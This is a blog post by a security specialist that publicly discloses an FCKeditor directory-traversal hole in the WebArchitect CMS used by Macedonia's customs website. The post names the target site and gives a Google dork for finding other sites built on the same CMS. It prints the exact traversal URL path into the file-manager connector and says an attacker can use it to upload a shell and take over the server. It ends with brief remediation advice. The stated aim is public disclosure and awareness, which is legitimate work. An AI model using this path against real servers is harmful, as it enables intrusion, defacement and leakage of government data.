Simple hack into web server of CUSTOMS of Republic of MACEDONIA

Dear my lovely Macedonia,

Now I’am far away from my hometown Gostivar and my country Macedonia, and trying to help to my  country in the IT security is still my priority, also how we can increase the Security Awareness is still my main concern. I published the FCKEDITOR hack before one and a half years a go. And like I see that there is no any positive wish to fix this RISK that is coming with the WEB ARCHITECT CMS platform. Unfortunately a lot-of Government institutions are using this platform for their web servers. One of them is CUSTOMS.GOV.MK of Republic of Macedonia which have the exploitable version of WEBARCHITECT CMS which have the working exploit of FCKEDITOR. So I hope this will raise some positive alarm to the IT TEAM of the CUSTOMS and fix this hole before some “ATTACKERS” make some defacement of the CUSTOMS.GOV.MK web server and even to leak some confidential data.

The POC the proof of concept is very simple:

If you visit the WWW.CUSTOMS.GOV.MK web site you will notice that the CMS is from WEBARCHITECT  LogoDeployed or you can use goole dork with this custom search:

site:MK inurl:WEBARCHITECT  you will find the   http://carina.webarchitect.com.mk.

and the second step is just to paste the code:

/FCKeditor/editor/filemanager/browser/default/browser.html?Type=/../../&Connector=connectors/aspx/connector.aspx

This will activate the Directory Traversal Attack

http://en.wikipedia.org/wiki/Directory_traversal_attack

 

Conclusion:

The result of this attack is full ROOT HACK with UPLOADER to the Read/Write enabled folders, where attacker can upload a shell and to take over the whole server. So like we can see this hack is very easy and can be conducted from any attacker which have a general knowledge form hacking techniques.

 

Remediation:

The remediation for this attack is to update the exploitable FCKEDITOR version to new one or to change the FCKEDITOR folders permission.

 

Kind regards,

Senad Aruc

Senior Security Specialist

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

w

Connecting to %s

Create a free website or blog at WordPress.com.

Up ↑

%d bloggers like this: